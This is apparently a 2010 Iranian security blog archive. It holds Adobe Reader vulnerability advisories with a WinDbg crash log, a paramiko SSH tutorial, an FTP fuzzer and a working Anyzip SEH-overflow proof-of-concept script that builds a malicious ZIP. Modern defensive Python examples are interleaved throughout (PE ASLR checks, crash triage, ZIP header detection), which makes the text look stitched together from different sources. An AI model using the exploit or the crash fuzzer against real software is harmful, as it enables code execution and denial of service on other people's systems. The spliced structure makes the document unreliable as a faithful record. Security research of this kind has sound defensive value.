Tuesday, September 14, 2010

Adobe Acrobat Reader 0-day / bypass dep+aslr

As you saw, several security vulnerabilities were reported in the Adobe Acrobat Reader product over the past month. In 30 days of research, my friends and I at the itsecteam lab managed to discover several vulnerabilities, two of which we released as a public advisory.


Adobe Acrobat Reader All Version Memory Corruption

Adobe Acrobat Reader acroform_PlugInMain memory corruption

Advisory URL:

http://itsecteam.com/en/papers/paper11.htm
http://itsecteam.com/en/papers/paper12.htm

Of course, most of the results, exploits and tools that were written have not been made public :)

Iranian friends and colleagues have not been idle either and have shown their keen interest in this "special" product!... which again produced some interesting public results

@abysssec:

MOAUB #12 - Adobe Acrobat and Reader "pushstring" Memory Corruption

MOAUB #1 - Adobe Acrobat Reader and Flash Player “newclass” invalid pointer - Binary Analysis

MOAUB #1 - Adobe Acrobat Reader and Flash Player “newclass” invalid pointer

@Ramz Afzar:

Adobe Acrobat Font Parsing Integer Overflow Vulnerability


Of course, the last bug mentioned had already been made public by Mr. Charlie Miller in a 70-page document. You know Charlie Miller too: he exploited the MacBook Air at the pwn2own conference in 2 minutes. A PhD in mathematics from University Notre, and now sets off the bomb!!!! A brilliant masterpiece from the nameless friends "Unknown" and the dear folks at Metasploit:

 
 
Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
adobe_cooltype_sing.rb

The interesting features of this exploit are bypassing DEP and, in their own words:

"unpublished technique to bypass ASLR"

To implement this exploit, icucnv36.dll was used, because this DLL has functions or APIs that must be called from a fixed address, so in practice ASLR cannot be applied to this DLL.
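The point made about icucnv36.dll (a module ASLR could not be applied to) is something a defender can check for directly: a PE module only takes part in ASLR if the DllCharacteristics field of its optional header sets DYNAMIC_BASE, and DEP opt-in is the NX_COMPAT bit next to it. The following is an added example written for this page, not code from the post, from Adobe or from Metasploit; it reads that field with the standard library and lists modules that lack the ASLR bit. The flag values are the documented PE/COFF ones; build_stub_pe constructs a minimal fake header for testing and modules_without_aslr is a helper name chosen here.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DYNAMIC_BASE = 0x0040     # module opts in to ASLR
NX_COMPAT = 0x0100        # module opts in to DEP
HIGH_ENTROPY_VA = 0x0020  # 64-bit ASLR with high-entropy addresses


def pe_mitigations(data):
    """Read DllCharacteristics from a PE image (at least its headers, as bytes) and
    report which mitigations the module opted into. Raises ValueError for non-PE input."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    # the 20-byte COFF file header follows the signature; SizeOfOptionalHeader is at +16
    opt_size = struct.unpack_from("<H", data, e_lfanew + 4 + 16)[0]
    opt = e_lfanew + 24
    if opt_size < 72 or len(data) < opt + 72:
        raise ValueError("optional header truncated")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):  # PE32, PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+
    flags = struct.unpack_from("<H", data, opt + 70)[0]
    return {"aslr": bool(flags & DYNAMIC_BASE),
            "dep": bool(flags & NX_COMPAT),
            "high_entropy_va": bool(flags & HIGH_ENTROPY_VA)}


def modules_without_aslr(paths):
    """Return the paths whose PE headers lack DYNAMIC_BASE, i.e. modules that would
    load at a fixed address the way the post describes. Reads only the first 4 KiB,
    which covers the headers of any normal image."""
    missing = []
    for path in paths:
        with open(path, "rb") as f:
            head = f.read(4096)
        try:
            if not pe_mitigations(head)["aslr"]:
                missing.append(path)
        except ValueError:
            pass  # not a PE file
    return missing


def build_stub_pe(dll_characteristics, pe32plus=False):
    """Constructed minimal PE header (no sections) for testing; not a real module."""
    img = bytearray(0x80 + 24 + 240)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)          # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    machine = 0x8664 if pe32plus else 0x14C
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics
    struct.pack_into("<HHIIIHH", img, 0x84, machine, 0, 0, 0, 0, 240, 0x2102)
    opt = 0x80 + 24
    struct.pack_into("<H", img, opt, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", img, opt + 70, dll_characteristics)
    return bytes(img)


if __name__ == "__main__":
    import sys
    for path in modules_without_aslr(sys.argv[1:]):
        print("no ASLR opt-in:", path)
```

Run it over a plug-in directory (for example the Reader plug_ins folder shown in the crash log below) to list the modules that would load at a fixed address.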

In the words of our friend Felipe Andres Manzano

"For PATCH adobe bug.. delete the plugin"

Monday, September 13, 2010

Acrobat Reader memory corruption advisory / analysis



Discovered a vulnerability in Adobe Reader and Adobe Acrobat that could allow remote code execution

OVERVIEW:

A vulnerability has been discovered in the Adobe Acrobat and Adobe Reader applications which could allow attackers to execute arbitrary code on the affected systems. Adobe Reader allows users to view Portable Document Format (PDF) files while Adobe Acrobat offers users additional features such as the ability to create PDF files. This vulnerability may be exploited if a user visits or is redirected to a specially crafted web page or when a user opens a specially crafted PDF file. Successful exploitation will result in an attacker gaining the same privileges as the logged on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Failed exploit attempts will likely cause denial-of-service conditions.

SYSTEMS AFFECTED:

  • Adobe Acrobat 9.3.4 for Windows
  • Adobe Acrobat 9.x
  • Adobe Acrobat 8.x
  • Adobe Reader 7.x

VULNERABILITY DESCRIPTION:

Adobe Reader and Adobe Acrobat are prone to a remote code execution vulnerability when handling malicious PDF files. The vulnerability is a remote memory corruption that occurs in 'AcroForm.api' when processing unspecified 'special characters'. This vulnerability may be exploited if a user visits or is redirected to a specially crafted web page. Exploitation may also occur when a user opens a specially crafted PDF file.


Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000001 ecx=02ae1314 edx=020c4bc8 esi=02adb470 edi=0012f4b4
eip=20946b4a esp=0012f414 ebp=0012f470 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api -
AcroForm!DllUnregisterServer+0x130993:
20946b4a 8b00 mov eax,dword ptr [eax] ds:0023:00000000=????????
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:000> u
AcroForm!DllUnregisterServer+0x130993:
20946b4a 8b00 mov eax,dword ptr [eax]
20946b4c c3 ret
20946b4d 56 push esi
20946b4e 8b742408 mov esi,dword ptr [esp+8]
20946b52 57 push edi
20946b53 33ff xor edi,edi
20946b55 393e cmp dword ptr [esi],edi
20946b57 7e1a jle AcroForm!DllUnregisterServer+0x1309bc (20946b73)


Well, we see that the program raises an access violation at mov eax,dword ptr [eax], because eax is 0 at that point (a null-pointer read).


The memory corruption occurs when the special characters are injected. However, because the registers cannot be controlled and the crash location cannot be changed through the chain, no way to exploit this vulnerability has been found so far. The API above and the following 3 modules can be seen with their addresses.
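The first triage question for a crash like the one above is what kind of access faulted and at which address, since a read from the unmapped null page is a deterministic crash rather than control of execution. Here is an added example, not part of the advisory, that applies that heuristic to WinDbg text: it parses the register dump and the faulting instruction, decides whether the access is a read or a write and computes the effective address, and classes a fault below the first 64 KiB as a null-pointer dereference. SAMPLE_NULL_READ is copied from the log above; SAMPLE_WRITE is a constructed contrast case; the 0x10000 threshold and the class names are this example's own choices.

```python
import re

# Sample copied from the WinDbg output in this post (register dump + faulting instruction)
SAMPLE_NULL_READ = """\
eax=00000000 ebx=00000001 ecx=02ae1314 edx=020c4bc8 esi=02adb470 edi=0012f4b4
eip=20946b4a esp=0012f414 ebp=0012f470 iopl=0 nv up ei pl zr na pe nc
20946b4a 8b00 mov eax,dword ptr [eax] ds:0023:00000000=????????
"""
# Constructed contrast case (not from the post): a write through a non-null pointer
SAMPLE_WRITE = """\
eax=41414141 ecx=02ae1314 eip=10001000
10001000 894104 mov dword ptr [ecx+4],eax
"""

REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[bs]p|eip)=([0-9a-fA-F]{8})")
INSN_RE = re.compile(r"^[0-9a-f]{8}\s+[0-9a-f]+\s+([a-z]+)\s+(.+)$", re.M)
MEM_RE = re.compile(r"\[([^\]]+)\]")
EA_RE = re.compile(r"\b[a-z]s:[0-9a-f]{4}:([0-9a-f]{8})=")
NULL_PAGE_LIMIT = 0x10000  # Windows keeps the lowest 64 KiB of user space unmapped


def parse_registers(text):
    return {name.lower(): int(val, 16) for name, val in REG_RE.findall(text)}


def faulting_instruction(text):
    """(mnemonic, operands) of the first 'address bytes mnemonic operands' line."""
    m = INSN_RE.search(text)
    return (m.group(1), m.group(2).strip()) if m else None


def effective_address(operands, regs):
    m = EA_RE.search(operands)  # WinDbg prints the effective address after the instruction
    if m:
        return int(m.group(1), 16)
    m = MEM_RE.search(operands)
    if not m:
        return None
    # otherwise evaluate a simple [reg], [reg+disp] or [reg-disp] form from the dump
    m2 = re.match(r"^(e[a-z]{2})(?:([+-])([0-9a-fA-F]+)h?)?$", m.group(1).replace(" ", ""))
    if not m2 or m2.group(1) not in regs:
        return None
    addr = regs[m2.group(1)]
    if m2.group(2):
        disp = int(m2.group(3), 16)
        addr += disp if m2.group(2) == "+" else -disp
    return addr & 0xFFFFFFFF


def triage(text):
    regs = parse_registers(text)
    insn = faulting_instruction(text)
    if insn is None:
        return {"class": "unknown", "reason": "no faulting instruction line"}
    mnemonic, operands = insn
    if not MEM_RE.search(operands):
        return {"class": "unknown", "reason": "no memory operand"}
    # Intel syntax lists the destination first, so a bracketed first operand is a write
    access = "write" if "[" in operands.split(",")[0] else "read"
    addr = effective_address(operands, regs)
    if addr is None:
        cls = "unknown"
    elif addr < NULL_PAGE_LIMIT:
        cls = "null-deref"  # deterministic crash: a DoS, not control of execution by itself
    else:
        cls = "wild-" + access
    return {"eip": regs.get("eip"), "mnemonic": mnemonic, "access": access,
            "address": addr, "class": cls}


if __name__ == "__main__":
    print(triage(SAMPLE_NULL_READ))
    print(triage(SAMPLE_WRITE))
```

For the log above this yields a null-dereference read at eip 0x20946b4a, which agrees with the analysis that the crash is reliable but the faulting pointer is not controlled.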


------------------------------------------------------------------------------------
http://www.exploit-db.com/exploits/14761
http://packetstormsecurity.org/1008-exploits/adobear-corrupt.tgz
------------------------------------------------------------------------------------

POC File:

Adb_poc.zip

Saturday, May 1, 2010

SSH2 Protocol in python - Install Paramiko

To connect over SSH in Python you must import the Paramiko module.
Paramiko is a module for Python 2.2 (or higher) that implements the SSH2 protocol for secure (encrypted and authenticated) connections to remote machines.

Installing paramiko

On Ubuntu/Debian:

$ sudo apt-get install python-paramiko

On Gentoo Linux:

$ emerge paramiko

Or install from source:

$ wget http://www.lag.net/paramiko/download/paramiko-1.7.6.tar.gz
$ tar xzf paramiko-1.7.6.tar.gz
$ cd paramiko-1.7.6
$ python setup.py build
$ su -c "python setup.py install"


Here's a simple example:

import paramiko

ssh = paramiko.SSHClient()
ssh.load_system_host_keys()   # trust servers already in ~/.ssh/known_hosts; an unknown host is still rejected
ssh.connect('192.168.1.2', username='vinod', password='secret')

Another way is to use an SSH key:

import paramiko
import os

privatekeyfile = os.path.expanduser('~/.ssh/id_rsa')
mykey = paramiko.RSAKey.from_private_key_file(privatekeyfile)
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.connect('192.168.1.2', username='vinod', pkey=mykey)

Running Simple Commands

Let's run some simple commands on a remote machine.

import paramiko

ssh = paramiko.SSHClient()
# AutoAddPolicy accepts any unknown host key without checking it; fine in a lab,
# but outside one use load_system_host_keys() with the default RejectPolicy
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('beastie', username='vinod', password='secret')
stdin, stdout, stderr = ssh.exec_command('df -h')
print stdout.readlines()
ssh.close()
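The snippets above either fail on a host that is not in known_hosts or, with AutoAddPolicy, accept whatever key the server presents. The following is an added example, not code from the post, written for Python 3 and current paramiko, showing the hardened form of the same client: known_hosts plus either RejectPolicy or a pinned SHA256 fingerprint for the unknown-host case, key authentication only, timeouts, and the command's exit status. sha256_fingerprint reproduces OpenSSH's fingerprint format; PinnedHostKey, run_command and SAMPLE_KEY_BLOB are names chosen here, and the blob is a constructed placeholder rather than a real key. The paramiko import is guarded only so the fingerprint helper still runs where paramiko is not installed.

```python
import base64
import hashlib
import os

try:
    import paramiko
except ImportError:  # the fingerprint helper below still works without paramiko installed
    paramiko = None


def sha256_fingerprint(key_blob_b64):
    """OpenSSH-style 'SHA256:...' fingerprint of a base64 public-key blob
    (the key field of a known_hosts line, or PKey.get_base64())."""
    digest = hashlib.sha256(base64.b64decode(key_blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


class PinnedHostKey(paramiko.MissingHostKeyPolicy if paramiko else object):
    """Accept a host missing from known_hosts only if its key matches a pinned fingerprint."""

    def __init__(self, expected_fp):
        self.expected_fp = expected_fp

    def missing_host_key(self, client, hostname, key):
        fp = sha256_fingerprint(key.get_base64())
        if fp != self.expected_fp:
            raise paramiko.SSHException(
                "host key for %s is %s, expected %s" % (hostname, fp, self.expected_fp))
        client.get_host_keys().add(hostname, key.get_name(), key)


def run_command(host, username, key_path, command, pinned_fp=None, timeout=10):
    """Run one command over SSH with key authentication; returns (exit_status, stdout, stderr)."""
    if paramiko is None:
        raise RuntimeError("paramiko is not installed")
    client = paramiko.SSHClient()
    client.load_system_host_keys()  # ~/.ssh/known_hosts
    # unknown hosts: reject outright, or compare against a fingerprint obtained out of band
    client.set_missing_host_key_policy(
        PinnedHostKey(pinned_fp) if pinned_fp else paramiko.RejectPolicy())
    pkey = paramiko.RSAKey.from_private_key_file(os.path.expanduser(key_path))
    client.connect(host, username=username, pkey=pkey, timeout=timeout,
                   allow_agent=False, look_for_keys=False)
    try:
        _, stdout, stderr = client.exec_command(command, timeout=timeout)
        out = stdout.read().decode("utf-8", "replace")
        err = stderr.read().decode("utf-8", "replace")
        status = stdout.channel.recv_exit_status()
    finally:
        client.close()
    return status, out, err


# Constructed placeholder blob for exercising the fingerprint helper; not a real key.
SAMPLE_KEY_BLOB = base64.b64encode(b"constructed placeholder, not a real ssh key").decode("ascii")

if __name__ == "__main__":
    print(sha256_fingerprint(SAMPLE_KEY_BLOB))
    # run_command("192.168.1.2", "vinod", "~/.ssh/id_rsa", "df -h",
    #             pinned_fp="SHA256:<fingerprint obtained out of band>")
```

A non-zero exit status or a populated stderr is surfaced to the caller rather than silently dropped, and the session is closed on every path, which the readlines()-and-forget pattern above does not guarantee.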

Friday, April 9, 2010

Anyzip (.zip) v1.1 0day Poc (SEH)


#! /usr/bin/python
# Anyzip (.zip) 0day Poc (SEH)

# Homepage : www.tbsoftinc.com
# Download : www.tbsoftinc.com/download/anyzip.exe
# Version : 1.1
# Tested Os : Windows XP SP1/SP3 EN
# Usage : Python anyzip.py
# Credit : ItSecTeam
# mail : Bug@ItSecTeam.com
# Web : WwW.ITSecTeam.com
# Forum : WwW.forum.itsecteam.com

header_1 =("\x50\x4B\x03\x04\x14\x00\x00"
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00")
header_2 = ("\x50\x4B\x01\x02\x14\x00\x14"
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")
header_3 = ("\x50\x4B\x05\x06\x00\x00\x00"
"\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00"
"\x02\x10\x00\x00"
"\x00\x00")
nseh="\x41\x41\x41\x41"
seh="\x65\x47\x7e\x6d"
payload = "A" * 297 + nseh + seh
predecoder = "\x59\x59\x59\x51\x5c"
payload=payload+predecoder
filltoebx="B" * (100-len(predecoder))
rest = "C" * (4064-len(payload+filltoebx)) + ".txt"
payload = payload+filltoebx+rest
exploit = header_1 + payload + header_2 + payload + header_3
try:
f=open("anyzip-poc.zip",'wb')
f.write(exploit)
f.close()
print "[+] File created successfully !"
except:
print "[-] Error cant write file to system\n"


http://www.exploit-db.com/exploits/12104
http://www.packetstormsecurity.org/1004-exploits/anyzip-overflow.txt
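The PoC above declares a filename length of 0x0fe4 = 4068 bytes in both the local file header and the central directory entry, far beyond what any ordinary archiver emits, and that oversized length field is what a detection check can key on. The following is an added example, not part of the original post, of that check: it walks the ZIP headers with struct and flags entries whose declared name length is implausible or larger than what the file actually contains. make_zip builds the constructed samples with the standard zipfile module; the 255-byte threshold is an assumption chosen here.

```python
import io
import struct
import zipfile

LOCAL_SIG = 0x04034B50    # "PK\x03\x04"
CENTRAL_SIG = 0x02014B50  # "PK\x01\x02"
MAX_NAME = 255            # assumed sane upper bound for a filename


def iter_name_lengths(data):
    """Yield (kind, offset, declared_name_len, name_bytes) for every local file header
    and central directory entry in a ZIP image."""
    # local headers: start at 0 and step by the sizes each header declares
    off = 0
    while off + 30 <= len(data):
        # sig, version, flags, method, mtime, mdate, crc, csize, usize, nlen, xlen
        fields = struct.unpack_from("<IHHHHHIIIHH", data, off)
        sig, flags, csize, nlen, xlen = fields[0], fields[2], fields[7], fields[9], fields[10]
        if sig != LOCAL_SIG:
            break
        yield "local", off, nlen, data[off + 30:off + 30 + nlen]
        if flags & 0x0008:  # data descriptor in use: compressed size not known up front
            break
        off += 30 + nlen + xlen + csize
    # central directory entries: locate by signature; the fixed part is 46 bytes and
    # the filename length field is at offset 28
    marker = struct.pack("<I", CENTRAL_SIG)
    pos = data.find(marker)
    while pos != -1 and pos + 46 <= len(data):
        nlen = struct.unpack_from("<H", data, pos + 28)[0]
        yield "central", pos, nlen, data[pos + 46:pos + 46 + nlen]
        pos = data.find(marker, pos + 46)


def suspicious_names(data, max_name=MAX_NAME):
    """List headers whose declared filename length is oversized or overruns the file."""
    findings = []
    for kind, off, nlen, name in iter_name_lengths(data):
        if nlen > max_name:
            findings.append({"kind": kind, "offset": off, "name_len": nlen,
                             "reason": "declared filename length exceeds %d" % max_name})
        elif len(name) < nlen:
            findings.append({"kind": kind, "offset": off, "name_len": nlen,
                             "reason": "header claims more name bytes than the file holds"})
    return findings


def make_zip(name):
    """Constructed sample archive with a single stored entry (not from the post)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as z:
        z.writestr(name, b"hello")
    return buf.getvalue()


BENIGN_ZIP = make_zip("readme.txt")
OVERLONG_ZIP = make_zip("A" * 4064 + ".txt")  # same 4068-byte name length as the PoC declares

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_ZIP), ("overlong", OVERLONG_ZIP)):
        print(label, suspicious_names(blob))
```

Running it on a real attachment stream is a matter of passing the file's bytes to suspicious_names; an archive is flagged once per header that carries the oversized length, so the PoC layout (local header plus central directory) produces two findings.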

Wednesday, March 17, 2010

Happy Nowruz

Greetings;
Happy New Year to all the friends and acquaintances who stop by here. I wish each and every one of you a good year.



I'm a bit busy; God willing, from now on I'll update this blog once a week.
Yours truly!
Happy New Year


Sunday, January 31, 2010

PyASM

Introduction

PyASM is a full-featured dynamic assembler written entirely in Python. By dynamic, I mean that it can be used to generate and execute machine code in Python at runtime without requiring the generation of object files and linkage. It essentially allows 'inline' assembly in Python modules on x86 platforms.

PyASM can also generate object files (for Windows) like a traditional standalone assembler, although you're probably better off using one of the many freely available assemblers if this is your primary goal.

Installation

PyASM requires python 2.4 or later. To the best of my knowledge, the only 2.4 specific feature I've used is from x import (a,b,c), but I need to draw a line in the sand somewhere as far as the installations I'll test and support.

Linux Install:

Windows Install:

Hello World!

A simple Windows version of a hello_world.py program is as follows:



#
# Hello World in assembly: hello_World.py
#
#

from pyasm import pyasm

pyasm(globals(),r"""
!CHARS hello_str 'Hello world!\n\0'

!PROC hello_world PYTHON
!ARG self
!ARG args

PUSH hello_str
CALL PySys_WriteStdout
ADD ESP, 0x4
MOV EAX,PyNone
ADD [EAX],1
!ENDPROC
""")

hello_world()



http://members.verizon.net/~olsongt/usersGuide.html
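PyASM's point is generating machine code and calling it from Python at runtime. An added example, not PyASM's code and not from the post, shows the same mechanism with only the standard library on Linux/x86-64: a hand-assembled add function is copied into an anonymous mapping, the mapping is flipped from RW to RX with mprotect so that it is never writable and executable at the same time, and ctypes calls it. X86_64_ADD, make_function, can_jit and jit_add are names chosen here; can_jit returns False on other platforms or where the sandbox refuses executable mappings.

```python
import ctypes
import mmap
import platform
import sys

# Constructed x86-64 System V function  int add(int a, int b)  with a in edi, b in esi
X86_64_ADD = bytes([0x89, 0xF8,   # mov eax, edi
                    0x01, 0xF0,   # add eax, esi
                    0xC3])        # ret

_libc = None


def _mprotect(addr, size, prot):
    global _libc
    if _libc is None:
        _libc = ctypes.CDLL(None, use_errno=True)  # the running process already links libc
        _libc.mprotect.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int]
        _libc.mprotect.restype = ctypes.c_int
    if _libc.mprotect(addr, size, prot) != 0:
        raise OSError(ctypes.get_errno(), "mprotect failed")


def make_function(code, restype, *argtypes):
    """Copy machine code into fresh memory and return a ctypes callable for it."""
    # 1. anonymous read/write mapping (page-aligned, so mprotect can act on it)
    buf = mmap.mmap(-1, len(code), prot=mmap.PROT_READ | mmap.PROT_WRITE)
    buf.write(code)
    addr = ctypes.addressof(ctypes.c_char.from_buffer(buf))
    # 2. drop write before adding execute: W^X, the page is never RWX
    _mprotect(addr, len(code), mmap.PROT_READ | mmap.PROT_EXEC)
    fn = ctypes.CFUNCTYPE(restype, *argtypes)(addr)
    fn._mapping = buf  # keep the mapping alive as long as the callable exists
    return fn


def can_jit():
    """True on Linux/x86-64 when executable mappings are permitted."""
    if not sys.platform.startswith("linux") or platform.machine() not in ("x86_64", "AMD64"):
        return False
    try:
        make_function(X86_64_ADD, ctypes.c_int, ctypes.c_int, ctypes.c_int)
    except OSError:  # e.g. a sandbox or SELinux execmem policy denied PROT_EXEC
        return False
    return True


def jit_add(a, b):
    fn = make_function(X86_64_ADD, ctypes.c_int, ctypes.c_int, ctypes.c_int)
    return fn(a, b)


if __name__ == "__main__":
    if can_jit():
        print("2 + 3 =", jit_add(2, 3))
    else:
        print("runtime code execution not available on this platform")
```

The two-step RW then RX protection change is the detail worth copying: a mapping created directly as PROT_READ|PROT_WRITE|PROT_EXEC is exactly the kind of region DEP was introduced to eliminate.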

Friday, January 29, 2010

FTP Fuzzing - update

This is a simple FTP server fuzzer written in Python.
This script helps you hunt for bugs; for example, I found two FTP vulnerabilities with it:
XM Easy Personal FTP Server 5.8 Remote Denial Of Service XM-ftp-dos.txt
FtpXQ FTP Server 3.0 Remote Denial Of Service Exploit ftpxq-dos.txt



[+] you must use Python 2.x
[+] fix cmdtest loop

#!/usr/bin/python
import socket, sys, time
banner = """
##############################################
## Iranian Pentesters Home ##
## Www.Pentesters.Ir ##
## PLATEN -[ H.jafari ]- ##
## Sample Ftp Fuzzer version 0.1 ##
## Code by: PLATEN ##
## E-mail && blog: ##
## h-jafari.blogspot.com ##
## pl4ten[at]gmail[dot]com ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##
## and all members in Pentesters.ir ##
##############################################
"""
print banner
ip = raw_input("IP: ")
username = raw_input("Username: ")
passwd = raw_input("Password: ")
bytesize = int(raw_input("Max byte size: "))   # raw_input returns a string; compare as a number
# if you don't use the default port (21), change this.
port = 21
cmdtest = ["USER", "PASS", "LIST", "MKD", "ABOR", "CWD", "ACCT", "NLST", "DELE", "APPE", "PORT", "PASV", "NOOP",
           "AUTH", "HOST", "LANG", "FEAT", "RMD", "SIZE", "XRMD", "XPWD", "XCRC", "XCUP", "TYPE", "RNFR", "QUIT"]

def login():
    # open a control session and authenticate; returns the connected socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    s.connect((ip, port))
    print "[+] " + s.recv(1024)
    s.send("user %s\r\n" % username)
    s.recv(1024)
    s.send("pass %s\r\n" % passwd)
    s.recv(1024)
    return s

def alive():
    # liveness probe: a fresh TCP connect to the service
    try:
        probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        probe.settimeout(5)
        probe.connect((ip, port))
        probe.close()
        return True
    except socket.error:
        return False

try:
    sock = login()
except socket.error:
    print "\n[-] Connection error!\n"
    sys.exit(1)

print "[+] Start Fuzzing...\n"
for cmd in cmdtest:
    d = 1                              # restart the size ladder for every command
    while d <= bytesize:
        payload = "\x41" * d
        print "[+] Send evil string", cmd, d, "\n"
        try:
            sock.send(cmd + " " + payload + "\r\n")
            sock.recv(1024)            # a live server answers; a dead one resets or times out
        except socket.error:
            # the server dropped this session; if it is still listening, log in again
            if not alive():
                print "[+] Down! %s with %d bytes" % (cmd, d)
                sys.exit(0)
            try:
                sock = login()
            except socket.error:
                print "[+] Down! %s with %d bytes" % (cmd, d)
                sys.exit(0)
        d = d * 2
        time.sleep(0.5)
print "[+] Server survived every test case"
sock.close()